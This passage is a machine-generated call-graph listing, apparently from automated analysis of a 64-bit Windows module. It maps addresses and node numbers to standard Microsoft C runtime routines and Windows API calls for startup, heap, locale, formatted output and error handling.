terminate 35 API calls 18183->18184 18185 7fef7545961 18184->18185 17022 7fef7535357 17025 7fef7539360 LeaveCriticalSection 17022->17025 17024 7fef7535361 17025->17024 18650 7fef753a057 18651 7fef753a061 18650->18651 18652 7fef753a234 18651->18652 18653 7fef753a08e __initmbctable 18651->18653 18654 7fef753a25d IsValidCodePage 18652->18654 18658 7fef753a22d __initmbctable 18652->18658 18659 7fef753a5e0 __initmbctable 19 API calls 18653->18659 18656 7fef753a27b GetCPInfo 18654->18656 18654->18658 18655 7fef7533280 __GSHandlerCheck 8 API calls 18657 7fef753a470 18655->18657 18656->18658 18661 7fef753a295 __initmbctable 18656->18661 18658->18655 18659->18658 18660 7fef753a5e0 __initmbctable 19 API calls 18660->18658 18661->18660 17647 7fef7550e40 17648 7fef7550e50 17647->17648 17649 7fef7550e5e 17647->17649 17648->17649 17650 7fef7533e00 3 API calls 17648->17650 17650->17649 18662 7fef7551040 18665 7fef753e8f0 18662->18665 18664 7fef755108f 18666 7fef753e90d 18665->18666 18667 7fef7543cc0 __SehTransFilter 39 API calls 18666->18667 18668 7fef753e980 18667->18668 18668->18664 18190 7fef754f53e 18191 7fef754f55c 18190->18191 18192 7fef754f74d 18191->18192 18193 7fef7550170 23 API calls 18191->18193 18194 7fef7533280 __GSHandlerCheck 8 API calls 18192->18194 18193->18192 18195 7fef754f7c5 18194->18195 16551 7fef7537640 GetStartupInfoW 16560 7fef7537676 _calloc_dbg 16551->16560 16552 7fef7537689 16553 7fef7537ce0 SetHandleCount 16553->16552 16554 7fef7537b95 GetStdHandle 16556 7fef7537c7b 16554->16556 16557 7fef7537bb9 16554->16557 16555 7fef7537ab9 16555->16553 16555->16554 16555->16556 16556->16553 16557->16556 16558 7fef7537bc8 GetFileType 16557->16558 16558->16556 16559 7fef7537beb InitializeCriticalSectionAndSpinCount 16558->16559 16559->16552 16559->16556 16560->16552 16560->16555 16562 7fef7537a32 InitializeCriticalSectionAndSpinCount 16560->16562 16563 7fef7537a19 GetFileType 16560->16563 16562->16552 16562->16555 16563->16555 16563->16562 17651 7fef753ae40 17652 7fef753d490 std::exception::_Copy_str 17 API calls 17651->17652 17653 7fef753ae59 17652->17653 17654 7fef7537ff0 _invoke_watson_if_error 16 API calls 17653->17654 17655 7fef753ae86 std::exception::_Copy_str 17654->17655 17659 7fef753af3a std::exception::_Copy_str 17655->17659 17674 7fef7540fd0 17655->17674 17657 7fef753af0d 17658 7fef7537ff0 _invoke_watson_if_error 16 API calls 17657->17658 17658->17659 17661 7fef753b2e0 17659->17661 17662 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17659->17662 17660 7fef753b33e 17684 7fef7540cc0 17660->17684 17661->17660 17663 7fef753d490 std::exception::_Copy_str 17 API calls 17661->17663 17662->17661 17665 7fef753b311 17663->17665 17667 7fef7537ff0 _invoke_watson_if_error 16 API calls 17665->17667 17667->17660 17668 7fef753b37d 17672 7fef7533280 __GSHandlerCheck 8 API calls 17668->17672 17669 7fef753cff0 terminate 34 API calls 17670 7fef753b373 17669->17670 17671 7fef7537090 _exit 33 API calls 17670->17671 17671->17668 17673 7fef753b3a0 17672->17673 17675 7fef7540ff7 17674->17675 17677 7fef7540ff0 __SehTransFilter 17674->17677 17676 7fef7541055 17675->17676 17679 7fef7541093 _calloc_dbg_impl 17675->17679 17678 7fef753bd70 _invalid_parameter 17 API calls 17676->17678 17677->17657 17678->17677 17679->17677 17680 7fef754111a 17679->17680 17682 7fef7541158 17679->17682 17681 7fef753bd70 _invalid_parameter 17 API calls 17680->17681 17681->17677 17682->17677 17683 7fef753bd70 _invalid_parameter 17 API calls 17682->17683 17683->17677 17702 7fef7533d00 RtlEncodePointer 17684->17702 17686 7fef7540cf6 17687 7fef7540d23 LoadLibraryW 17686->17687 17689 7fef7540e15 17686->17689 17688 7fef7540d44 GetProcAddress 17687->17688 17690 7fef7540d3d 17687->17690 17688->17690 17691 7fef7540d6a 7 API calls 17688->17691 17692 7fef7540e39 DecodePointer DecodePointer 17689->17692 17698 7fef7540e68 17689->17698 17693 7fef7533280 __GSHandlerCheck 8 API calls 17690->17693 17691->17689 17695 7fef7540df3 GetProcAddress EncodePointer 17691->17695 17692->17698 17699 7fef753b358 17693->17699 17694 7fef7540f60 DecodePointer 17694->17690 17695->17689 17696 7fef7540eed DecodePointer 17697 7fef7540f0d 17696->17697 17697->17694 17700 7fef7540f2f DecodePointer 17697->17700 17698->17696 17698->17697 17701 7fef7540ec8 17698->17701 17699->17668 17699->17669 17700->17694 17700->17701 17701->17694 17702->17686 17703 7fef7539240 17704 7fef753925f 17703->17704 17705 7fef753924d 17703->17705 17706 7fef7539281 InitializeCriticalSectionAndSpinCount 17704->17706 17707 7fef7539295 17704->17707 17706->17707 17709 7fef7539360 LeaveCriticalSection 17707->17709 17709->17705 18196 7fef7531140 18197 7fef753116a 18196->18197 18198 7fef753118c 18197->18198 18199 7fef753119a FileTimeToSystemTime 18197->18199 18201 7fef7533280 __GSHandlerCheck 8 API calls 18198->18201 18199->18198 18200 7fef75311ae 18199->18200 18204 7fef7531000 GetThreadLocale GetDateFormatA 18200->18204 18203 7fef75311d0 18201->18203 18205 7fef7531062 GetThreadLocale GetTimeFormatA 18204->18205 18206 7fef753105b 18204->18206 18205->18206 18206->18198 18669 7fef754dc41 18670 7fef754ee40 25 API calls 18669->18670 18671 7fef754da75 18670->18671 18672 7fef754eca1 18671->18672 18675 7fef754dbb5 18671->18675 18673 7fef753bd70 _invalid_parameter 17 API calls 18672->18673 18676 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18672->18676 18673->18676 18674 7fef7533280 __GSHandlerCheck 8 API calls 18677 7fef754ed9e 18674->18677 18678 7fef753bd70 _invalid_parameter 17 API calls 18675->18678 18676->18674 18678->18676 18679 7fef7538040 18680 7fef753805b GetModuleFileNameA 18679->18680 18681 7fef7538056 18679->18681 18683 7fef7538083 18680->18683 18682 7fef753aa40 __initmbctable 24 API calls 18681->18682 18682->18680 18684 7fef753d04a 18685 7fef753d1d8 DecodePointer 18684->18685 18686 7fef753d1e8 18685->18686 18687 7fef753d1f0 18686->18687 18688 7fef7537090 _exit 33 API calls 18686->18688 18689 7fef753d209 18686->18689 18688->18689 18691 7fef753d289 18689->18691 18693 7fef7533d00 RtlEncodePointer 18689->18693 18691->18687 18694 7fef7539360 LeaveCriticalSection 18691->18694 18693->18691 18694->18687 17034 7fef7551370 17037 7fef754af60 17034->17037 17038 7fef754af74 17037->17038 17039 7fef754af98 LeaveCriticalSection 17037->17039 17042 7fef7539360 LeaveCriticalSection 17038->17042 17041 7fef754af96 17039->17041 17042->17041 18207 7fef754e16f 18209 7fef754e17c _CrtMemDumpAllObjectsSince wcsxfrm get_int64_arg 18207->18209 18208 7fef754eadf 18211 7fef754ef10 25 API calls 18208->18211 18209->18208 18210 7fef754eec0 25 API calls 18209->18210 18212 7fef754da75 18209->18212 18210->18208 18213 7fef754eafd 18211->18213 18215 7fef754eca1 18212->18215 18221 7fef754dbb5 18212->18221 18214 7fef754eb33 18213->18214 18217 7fef754eec0 25 API calls 18213->18217 18216 7fef754ec29 18214->18216 18227 7fef754eb49 _CrtMemDumpAllObjectsSince 18214->18227 18219 7fef753bd70 _invalid_parameter 17 API calls 18215->18219 18226 7fef754dbe9 _LocaleUpdate::~_LocaleUpdate 18215->18226 18218 7fef754ef10 25 API calls 18216->18218 18217->18214 18228 7fef754ebda 18218->18228 18219->18226 18220 7fef7533280 __GSHandlerCheck 8 API calls 18223 7fef754ed9e 18220->18223 18224 7fef753bd70 _invalid_parameter 17 API calls 18221->18224 18222 7fef754eec0 25 API calls 18222->18212 18224->18226 18225 7fef754f000 wcsxfrm 2 API calls 18225->18227 18226->18220 18227->18225 18227->18228 18229 7fef754ee40 25 API calls 18227->18229 18228->18212 18228->18222 18229->18227 16260 7fef7538670 GetEnvironmentStringsW 16261 7fef7538690 16260->16261 16263 7fef7538697 WideCharToMultiByte 16260->16263 16264 7fef7538733 16263->16264 16265 7fef753875f FreeEnvironmentStringsW 16263->16265 16264->16265 16266 7fef753876e WideCharToMultiByte 16264->16266 16265->16261 16267 7fef75387c2 FreeEnvironmentStringsW 16266->16267 16268 7fef75387aa 16266->16268 16267->16261 16268->16267 16306 7fef7533471 16307 7fef753347a 16306->16307 16316 7fef75334bc 16306->16316 16308 7fef7533496 16307->16308 16318 7fef75370b0 16307->16318 16310 7fef7537d00 _ioterm DeleteCriticalSection 16308->16310 16311 7fef753349b 16310->16311 16312 7fef7533e00 3 API calls 16311->16312 16313 7fef75334a0 16312->16313 16321 7fef75388d0 HeapDestroy 16313->16321 16315 7fef75334a5 16315->16316 16317 7fef7533e00 3 API calls 16315->16317 16317->16316 16322 7fef7537280 16318->16322 16321->16315 16323 7fef7537296 _exit 16322->16323 16324 7fef75372c7 RtlDecodePointer 16323->16324 16331 7fef7537368 _initterm 16323->16331 16343 7fef753744e 16323->16343 16326 7fef75372e5 DecodePointer 16324->16326 16324->16331 16325 7fef753745e 16328 7fef75370c3 16325->16328 16329 7fef7537520 _exit LeaveCriticalSection 16325->16329 16339 7fef7537314 16326->16339 16328->16308 16330 7fef7537479 16329->16330 16369 7fef75374e0 16330->16369 16331->16343 16346 7fef7536210 16331->16346 16335 7fef753736d DecodePointer 16345 7fef7533d00 RtlEncodePointer 16335->16345 16339->16331 16339->16335 16342 7fef7537391 DecodePointer DecodePointer 16339->16342 16344 7fef7533d00 RtlEncodePointer 16339->16344 16340 7fef7537449 16359 7fef7536f10 16340->16359 16342->16339 16343->16325 16366 7fef7537520 16343->16366 16344->16339 16345->16339 16347 7fef7536229 16346->16347 16348 7fef753628f 16347->16348 16350 7fef75362cb 16347->16350 16372 7fef753bd70 DecodePointer 16348->16372 16376 7fef7539360 LeaveCriticalSection 16350->16376 16351 7fef75362c3 16351->16343 16353 7fef7537100 16351->16353 16354 7fef7537112 16353->16354 16355 7fef75371e4 DecodePointer 16354->16355 16356 7fef75371fe 16355->16356 16401 7fef7533d00 RtlEncodePointer 16356->16401 16358 7fef7537219 16358->16340 16402 7fef75363e0 16359->16402 16361 7fef7536f8e 16363 7fef7533280 __GSHandlerCheck 8 API calls 16361->16363 16362 7fef7536f33 16362->16361 16410 7fef7536660 16362->16410 16365 7fef7536fa7 16363->16365 16365->16343 16478 7fef7539360 LeaveCriticalSection 16366->16478 16368 7fef753752e 16368->16325 16479 7fef7537490 GetModuleHandleW 16369->16479 16373 7fef753bdd0 16372->16373 16374 7fef753bdac 16372->16374 16377 7fef753be00 16373->16377 16374->16351 16376->16351 16380 7fef753be50 16377->16380 16381 7fef753be81 __GSHandlerCheck 16380->16381 16382 7fef753be8d RtlCaptureContext RtlLookupFunctionEntry 16380->16382 16381->16382 16383 7fef753bf64 16382->16383 16384 7fef753bf1c RtlVirtualUnwind 16382->16384 16385 7fef753bf84 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16383->16385 16384->16385 16386 7fef753bfde __GSHandlerCheck 16385->16386 16389 7fef7533280 16386->16389 16388 7fef753be2d GetCurrentProcess TerminateProcess 16388->16374 16391 7fef7533289 16389->16391 16390 7fef7533294 16390->16388 16391->16390 16392 7fef7533720 RtlCaptureContext RtlLookupFunctionEntry 16391->16392 16393 7fef7533764 RtlVirtualUnwind 16392->16393 16394 7fef75337a5 16392->16394 16395 7fef75337c7 IsDebuggerPresent 16393->16395 16394->16395 16400 7fef7538d90 16395->16400 16397 7fef7533826 SetUnhandledExceptionFilter UnhandledExceptionFilter 16398 7fef7533844 __GSHandlerCheck 16397->16398 16399 7fef753384e GetCurrentProcess TerminateProcess 16397->16399 16398->16399 16399->16388 16400->16397 16401->16358 16403 7fef75363f1 16402->16403 16404 7fef7536447 16403->16404 16407 7fef7536480 16403->16407 16405 7fef753bd70 _invalid_parameter 17 API calls 16404->16405 16406 7fef753647b 16405->16406 16406->16362 16409 7fef7536504 16407->16409 16414 7fef7539360 LeaveCriticalSection 16407->16414 16409->16362 16411 7fef7536681 _CrtMemDumpAllObjectsSince 16410->16411 16415 7fef7536850 16411->16415 16413 7fef7536698 _LocaleUpdate::~_LocaleUpdate 16413->16361 16414->16406 16416 7fef7536871 16415->16416 16417 7fef7536ba6 16416->16417 16420 7fef75368ed _CrtIsValidPointer 16416->16420 16445 7fef7539360 LeaveCriticalSection 16417->16445 16419 7fef7536bb0 16419->16413 16421 7fef753695e IsBadReadPtr 16420->16421 16422 7fef7536976 16420->16422 16431 7fef753692f 16420->16431 16421->16422 16423 7fef7536ad2 16422->16423 16424 7fef7536a29 16422->16424 16427 7fef7536b2d 16423->16427 16428 7fef7536add 16423->16428 16425 7fef7536abe 16424->16425 16426 7fef7536a86 IsBadReadPtr 16424->16426 16433 7fef7536bf0 16425->16433 16426->16425 16426->16431 16427->16431 16432 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16427->16432 16429 7fef7536bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 16428->16429 16429->16431 16431->16413 16432->16431 16434 7fef7536c28 16433->16434 16435 7fef7536e25 _LocaleUpdate::~_LocaleUpdate 16434->16435 16437 7fef7536c7a _CrtMemDumpAllObjectsSince 16434->16437 16436 7fef7533280 __GSHandlerCheck 8 API calls 16435->16436 16438 7fef7536e89 16436->16438 16440 7fef7536ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 16437->16440 16446 7fef753c260 16437->16446 16438->16431 16450 7fef753c0c0 16440->16450 16442 7fef7536e12 16442->16431 16443 7fef7536dc7 16443->16442 16453 7fef7536ea0 16443->16453 16445->16419 16447 7fef753c286 _CrtMemDumpAllObjectsSince wcsxfrm 16446->16447 16449 7fef753c29d _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16447->16449 16457 7fef753f4d0 16447->16457 16449->16440 16468 7fef7542260 16450->16468 16452 7fef753c103 16452->16443 16454 7fef7536ed1 16453->16454 16455 7fef7536ebd 16453->16455 16454->16442 16455->16454 16456 7fef753be00 _invalid_parameter 16 API calls 16455->16456 16456->16454 16458 7fef753f4f9 _CrtMemDumpAllObjectsSince 16457->16458 16461 7fef753f570 16458->16461 16460 7fef753f550 _LocaleUpdate::~_LocaleUpdate 16460->16449 16462 7fef753f599 MultiByteToWideChar 16461->16462 16465 7fef753f60b malloc _calloc_dbg_impl _MarkAllocaS 16462->16465 16466 7fef753f604 _CrtMemDumpAllObjectsSince_stat 16462->16466 16464 7fef753f68b MultiByteToWideChar 16464->16466 16467 7fef753f6ca GetStringTypeW 16464->16467 16465->16464 16465->16466 16466->16460 16467->16466 16469 7fef754228b 16468->16469 16470 7fef75422e1 16469->16470 16471 7fef754231f 16469->16471 16472 7fef753bd70 _invalid_parameter 17 API calls 16470->16472 16473 7fef7542385 16471->16473 16476 7fef75423c3 _calloc_dbg_impl 16471->16476 16475 7fef7542315 _calloc_dbg_impl 16472->16475 16474 7fef753bd70 _invalid_parameter 17 API calls 16473->16474 16474->16475 16475->16452 16476->16475 16477 7fef753bd70 _invalid_parameter 17 API calls 16476->16477 16477->16475 16478->16368 16480 7fef75374b2 GetProcAddress 16479->16480 16481 7fef75374d1 ExitProcess 16479->16481 16480->16481 17043 7fef7541b64 17045 7fef7541b9d 17043->17045 17044 7fef754ab10 17 API calls 17046 7fef7541c86 17044->17046 17045->17044 17045->17046 17047 7fef7541bed 17045->17047 17046->17047 17048 7fef7549290 23 API calls 17046->17048 17048->17047 18234 7fef7551160 18237 7fef7544e90 18234->18237 18236 7fef7551179 18238 7fef7544ebb 18237->18238 18239 7fef7544ecf 18237->18239 18238->18239 18240 7fef753cf50 terminate 35 API calls 18238->18240 18239->18236 18240->18239 16654 7fef7538860 HeapCreate 16655 7fef7538891 GetVersion 16654->16655 16656 7fef753888d 16654->16656 16657 7fef75388c1 16655->16657 16658 7fef75388a7 HeapSetInformation 16655->16658 16657->16656 16658->16657 17710 7fef7545260 17711 7fef7545296 __SehTransFilter _CreateFrameInfo 17710->17711 17712 7fef753ed30 _FindAndUnlinkFrame 36 API calls 17711->17712 17713 7fef75453e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 17712->17713 17053 7fef754bb66 17054 7fef754bb78 _CrtMemDumpAllObjectsSince wcsxfrm 17053->17054 17055 7fef754bc46 17054->17055 17057 7fef754b99c 17054->17057 17056 7fef753bd70 _invalid_parameter 17 API calls 17055->17056 17062 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17056->17062 17058 7fef754cc93 17057->17058 17060 7fef754bada 17057->17060 17059 7fef753bd70 _invalid_parameter 17 API calls 17058->17059 17058->17062 17059->17062 17064 7fef753bd70 _invalid_parameter 17 API calls 17060->17064 17061 7fef7533280 __GSHandlerCheck 8 API calls 17063 7fef754cd90 17061->17063 17062->17061 17064->17062 18245 7fef753ae14 18246 7fef753b390 18245->18246 18247 7fef7533280 __GSHandlerCheck 8 API calls 18246->18247 18248 7fef753b3a0 18247->18248 18249 7fef7540215 18250 7fef7540231 18249->18250 18260 7fef7540302 18249->18260 18320 7fef7548c80 18250->18320 18252 7fef7540489 18255 7fef7542d80 17 API calls 18252->18255 18254 7fef7537ff0 _invoke_watson_if_error 16 API calls 18257 7fef754027e OutputDebugStringW 18254->18257 18258 7fef75404a3 18255->18258 18256 7fef754040d 18256->18252 18261 7fef7541640 17 API calls 18256->18261 18262 7fef7540296 OutputDebugStringW OutputDebugStringW OutputDebugStringW OutputDebugStringW 18257->18262 18259 7fef7537ff0 _invoke_watson_if_error 16 API calls 18258->18259 18263 7fef75404d0 18259->18263 18260->18256 18327 7fef7548c30 18260->18327 18265 7fef754045c 18261->18265 18273 7fef75402f2 18262->18273 18268 7fef754053d 18263->18268 18269 7fef7542d80 17 API calls 18263->18269 18275 7fef7540583 18263->18275 18267 7fef7537ff0 _invoke_watson_if_error 16 API calls 18265->18267 18267->18252 18270 7fef7542d80 17 API calls 18268->18270 18271 7fef7540510 18269->18271 18272 7fef7540556 18270->18272 18277 7fef7537ff0 _invoke_watson_if_error 16 API calls 18271->18277 18278 7fef7537ff0 _invoke_watson_if_error 16 API calls 18272->18278 18279 7fef7533280 __GSHandlerCheck 8 API calls 18273->18279 18274 7fef7540357 18276 7fef75403af 18274->18276 18280 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18274->18280 18330 7fef7541590 18275->18330 18276->18256 18281 7fef7541640 17 API calls 18276->18281 18277->18268 18278->18275 18282 7fef7540cae 18279->18282 18280->18276 18284 7fef75403e0 18281->18284 18285 7fef7537ff0 _invoke_watson_if_error 16 API calls 18284->18285 18285->18256 18286 7fef75405fa 18287 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18286->18287 18288 7fef7540652 18286->18288 18287->18288 18289 7fef7541640 17 API calls 18288->18289 18291 7fef75406b0 18288->18291 18290 7fef7540683 18289->18290 18292 7fef7537ff0 _invoke_watson_if_error 16 API calls 18290->18292 18293 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18291->18293 18292->18291 18294 7fef7540769 18293->18294 18295 7fef753d490 std::exception::_Copy_str 17 API calls 18294->18295 18310 7fef75407bd 18294->18310 18296 7fef7540790 18295->18296 18297 7fef7537ff0 _invoke_watson_if_error 16 API calls 18296->18297 18297->18310 18298 7fef7540905 18298->18273 18299 7fef7540a26 18298->18299 18300 7fef75409a4 GetFileType 18298->18300 18301 7fef7540ba5 18299->18301 18302 7fef7540b97 OutputDebugStringW 18299->18302 18304 7fef75409d0 18300->18304 18309 7fef75409ce 18300->18309 18301->18273 18305 7fef7540c23 18301->18305 18306 7fef7548c80 _itow_s 17 API calls 18301->18306 18302->18301 18307 7fef75409dd WriteConsoleW 18304->18307 18334 7fef753b470 18305->18334 18308 7fef7540bf6 18306->18308 18307->18299 18311 7fef7540a2b GetLastError 18307->18311 18312 7fef7537ff0 _invoke_watson_if_error 16 API calls 18308->18312 18313 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18309->18313 18310->18298 18333 7fef7539360 LeaveCriticalSection 18310->18333 18311->18299 18311->18309 18312->18305 18315 7fef7540ab5 18313->18315 18316 7fef7540b26 WriteFile 18315->18316 18317 7fef7540ad0 18315->18317 18316->18299 18319 7fef7540add WriteFile 18317->18319 18319->18299 18321 7fef7548cd3 18320->18321 18322 7fef7548ca6 18320->18322 18323 7fef7548d00 _itow_s 17 API calls 18321->18323 18322->18321 18324 7fef7548cad 18322->18324 18326 7fef7540251 18323->18326 18360 7fef7548d00 18324->18360 18326->18254 18376 7fef75486b0 18327->18376 18329 7fef7548c74 18329->18274 18331 7fef75486b0 _wcsftime_l 17 API calls 18330->18331 18332 7fef75415de 18331->18332 18332->18286 18333->18298 18335 7fef753b48d 18334->18335 18336 7fef753b4c4 18335->18336 18337 7fef753b4ce GetModuleFileNameW 18335->18337 18340 7fef7533280 __GSHandlerCheck 8 API calls 18336->18340 18338 7fef753b4f2 18337->18338 18344 7fef753b538 18337->18344 18339 7fef7541640 17 API calls 18338->18339 18341 7fef753b50b 18339->18341 18342 7fef753ba58 18340->18342 18343 7fef7537ff0 _invoke_watson_if_error 16 API calls 18341->18343 18342->18273 18343->18344 18345 7fef7540fd0 17 API calls 18344->18345 18348 7fef753b5f2 18344->18348 18346 7fef753b5c5 18345->18346 18347 7fef7537ff0 _invoke_watson_if_error 16 API calls 18346->18347 18347->18348 18349 7fef7541590 _snwprintf_s 17 API calls 18348->18349 18350 7fef753b940 18349->18350 18351 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 18350->18351 18352 7fef753b998 18350->18352 18351->18352 18353 7fef7541640 17 API calls 18352->18353 18356 7fef753b9f6 18352->18356 18354 7fef753b9c9 18353->18354 18355 7fef7537ff0 _invoke_watson_if_error 16 API calls 18354->18355 18355->18356 18356->18336 18357 7fef753cff0 terminate 34 API calls 18356->18357 18358 7fef753ba2b 18357->18358 18359 7fef7537090 _exit 33 API calls 18358->18359 18359->18336 18361 7fef7548d25 18360->18361 18362 7fef7548d7b 18361->18362 18364 7fef7548db9 18361->18364 18363 7fef753bd70 _invalid_parameter 17 API calls 18362->18363 18373 7fef7548daf 18363->18373 18365 7fef7548e1a 18364->18365 18367 7fef7548e58 _calloc_dbg_impl 18364->18367 18366 7fef753bd70 _invalid_parameter 17 API calls 18365->18366 18366->18373 18368 7fef7548f5d 18367->18368 18369 7fef7548f9b 18367->18369 18370 7fef753bd70 _invalid_parameter 17 API calls 18368->18370 18371 7fef754900e 18369->18371 18374 7fef754904c 18369->18374 18370->18373 18372 7fef753bd70 _invalid_parameter 17 API calls 18371->18372 18372->18373 18373->18326 18374->18373 18375 7fef753bd70 _invalid_parameter 17 API calls 18374->18375 18375->18373 18378 7fef75486e6 18376->18378 18377 7fef754873c 18379 7fef753bd70 _invalid_parameter 17 API calls 18377->18379 18378->18377 18380 7fef754877a 18378->18380 18388 7fef7548770 _calloc_dbg_impl 18379->18388 18381 7fef754880e 18380->18381 18382 7fef754884c 18380->18382 18380->18388 18385 7fef753bd70 _invalid_parameter 17 API calls 18381->18385 18383 7fef7548992 18382->18383 18384 7fef7548862 18382->18384 18386 7fef7548350 _wcsftime_l 17 API calls 18383->18386 18391 7fef7548350 18384->18391 18385->18388 18389 7fef75488b1 _calloc_dbg_impl 18386->18389 18388->18329 18389->18388 18390 7fef753bd70 _invalid_parameter 17 API calls 18389->18390 18390->18388 18393 7fef754839b 18391->18393 18392 7fef75483f1 18394 7fef753bd70 _invalid_parameter 17 API calls 18392->18394 18393->18392 18395 7fef754842f 18393->18395 18397 7fef7548425 18394->18397 18396 7fef753bd70 _invalid_parameter 17 API calls 18395->18396 18395->18397 18396->18397 18397->18389 17068 7fef754d410 17073 7fef754d3e0 17068->17073 17071 7fef754d43c 17080 7fef7550070 17073->17080 17076 7fef754d710 17077 7fef754d721 17076->17077 17078 7fef754d726 17076->17078 17077->17071 17085 7fef7539360 LeaveCriticalSection 17078->17085 17083 7fef7550083 _free_nolock 17080->17083 17082 7fef754d402 17082->17071 17082->17076 17084 7fef7539360 LeaveCriticalSection 17083->17084 17084->17082 17085->17077 17086 7fef7542c10 17087 7fef7542c53 17086->17087 17088 7fef7542c24 _updatetlocinfoEx_nolock 17086->17088 17090 7fef7539360 LeaveCriticalSection 17088->17090 17090->17087 16482 7fef753461b 16485 7fef7534625 _calloc_dbg_impl 16482->16485 16484 7fef75348be 16486 7fef7539360 LeaveCriticalSection 16485->16486 16486->16484 17091 7fef7537816 17092 7fef7537826 _calloc_dbg 17091->17092 17095 7fef7537ab9 17092->17095 17096 7fef7537a32 InitializeCriticalSectionAndSpinCount 17092->17096 17097 7fef7537a19 GetFileType 17092->17097 17093 7fef7537ce0 SetHandleCount 17094 7fef7537aaf 17093->17094 17095->17093 17098 7fef7537b95 GetStdHandle 17095->17098 17099 7fef7537c7b 17095->17099 17096->17094 17096->17095 17097->17095 17097->17096 17098->17099 17100 7fef7537bb9 17098->17100 17099->17093 17100->17099 17101 7fef7537bc8 GetFileType 17100->17101 17101->17099 17102 7fef7537beb InitializeCriticalSectionAndSpinCount 17101->17102 17102->17094 17102->17099 18398 7fef7546203 18400 7fef754616e _CrtMemDumpAllObjectsSince wcsxfrm 18398->18400 18399 7fef7546238 MultiByteToWideChar 18401 7fef75461c8 _LocaleUpdate::~_LocaleUpdate 18399->18401 18400->18399 18400->18401 18402 7fef7550204 18404 7fef755023d 18402->18404 18403 7fef755028d 18404->18403 18405 7fef754ab10 17 API calls 18404->18405 18406 7fef7550326 18404->18406 18405->18406 18406->18403 18407 7fef7549290 23 API calls 18406->18407 18407->18403 18408 7fef7551200 18409 7fef753ed30 _FindAndUnlinkFrame 36 API calls 18408->18409 18410 7fef7551212 _IsExceptionObjectToBeDestroyed __SehTransFilter 18409->18410 17740 7fef754c30d 17741 7fef754c31a get_int64_arg _get_printf_count_output 17740->17741 17742 7fef754c39d 17741->17742 17753 7fef754c3f2 17741->17753 17743 7fef753bd70 _invalid_parameter 17 API calls 17742->17743 17751 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17743->17751 17744 7fef7533280 __GSHandlerCheck 8 API calls 17746 7fef754cd90 17744->17746 17745 7fef754b99c 17747 7fef754cc93 17745->17747 17750 7fef754bada 17745->17750 17749 7fef753bd70 _invalid_parameter 17 API calls 17747->17749 17747->17751 17748 7fef754b530 wctomb_s 19 API calls 17748->17753 17749->17751 17752 7fef753bd70 _invalid_parameter 17 API calls 17750->17752 17751->17744 17752->17751 17753->17745 17753->17748 17109 7fef7533409 17110 7fef7533e00 3 API calls 17109->17110 17111 7fef753340e 17110->17111 17114 7fef75388d0 HeapDestroy 17111->17114 17113 7fef7533413 17114->17113 18728 7fef7533909 18729 7fef7533913 __SehTransFilter 18728->18729 18730 7fef75339db __SehTransFilter 18729->18730 18731 7fef7533a71 RtlUnwindEx 18729->18731 18731->18730 17115 7fef7536c32 17116 7fef7536c3c 17115->17116 17117 7fef7536e25 _LocaleUpdate::~_LocaleUpdate 17116->17117 17119 7fef7536c7a _CrtMemDumpAllObjectsSince 17116->17119 17118 7fef7533280 __GSHandlerCheck 8 API calls 17117->17118 17120 7fef7536e89 17118->17120 17121 7fef753c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17119->17121 17122 7fef7536ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17119->17122 17121->17122 17123 7fef753c0c0 _swprintf_p 17 API calls 17122->17123 17125 7fef7536dc7 17123->17125 17124 7fef7536e12 17125->17124 17126 7fef7536ea0 _invoke_watson_if_oneof 16 API calls 17125->17126 17126->17124 16236 7fef7533433 16237 7fef7533437 16236->16237 16241 7fef7533446 16236->16241 16244 7fef7537d00 16237->16244 16246 7fef7537d0e 16244->16246 16245 7fef753343c 16248 7fef7533e00 16245->16248 16246->16245 16247 7fef7537d87 DeleteCriticalSection 16246->16247 16247->16246 16249 7fef7533e23 16248->16249 16250 7fef7533e0d FlsFree 16248->16250 16254 7fef75390b0 16249->16254 16250->16249 16253 7fef75388d0 HeapDestroy 16253->16241 16257 7fef75390be 16254->16257 16255 7fef75390fd DeleteCriticalSection 16255->16257 16256 7fef7533441 16256->16253 16257->16255 16258 7fef753914d 16257->16258 16258->16256 16259 7fef7539196 DeleteCriticalSection 16258->16259 16259->16258 17127 7fef754c435 17128 7fef754c479 _CrtMemDumpAllObjectsSince 17127->17128 17129 7fef754c598 DecodePointer 17128->17129 17130 7fef754c60d _CrtMemDumpAllObjectsSince 17129->17130 17131 7fef754c62b DecodePointer 17130->17131 17132 7fef754c652 _CrtMemDumpAllObjectsSince 17130->17132 17131->17132 17133 7fef754c676 DecodePointer 17132->17133 17143 7fef754c69d std::exception::_Copy_str 17132->17143 17133->17143 17134 7fef754b99c 17135 7fef754cc93 17134->17135 17138 7fef754bada 17134->17138 17137 7fef753bd70 _invalid_parameter 17 API calls 17135->17137 17140 7fef754bb0e _LocaleUpdate::~_LocaleUpdate 17135->17140 17136 7fef754b530 wctomb_s 19 API calls 17136->17143 17137->17140 17142 7fef753bd70 _invalid_parameter 17 API calls 17138->17142 17139 7fef7533280 __GSHandlerCheck 8 API calls 17141 7fef754cd90 17139->17141 17140->17139 17142->17140 17143->17134 17143->17136 16269 7fef7533d30 16287 7fef7537540 16269->16287 16274 7fef7533d42 16276 7fef7533e00 3 API calls 16274->16276 16275 7fef7533d4e FlsAlloc 16277 7fef7533d73 _calloc_dbg 16275->16277 16278 7fef7533d6a 16275->16278 16279 7fef7533d47 16276->16279 16281 7fef7533da4 FlsSetValue 16277->16281 16282 7fef7533db9 16277->16282 16280 7fef7533e00 3 API calls 16278->16280 16280->16279 16281->16282 16283 7fef7533dc2 16281->16283 16284 7fef7533e00 3 API calls 16282->16284 16296 7fef7533e30 16283->16296 16284->16279 16302 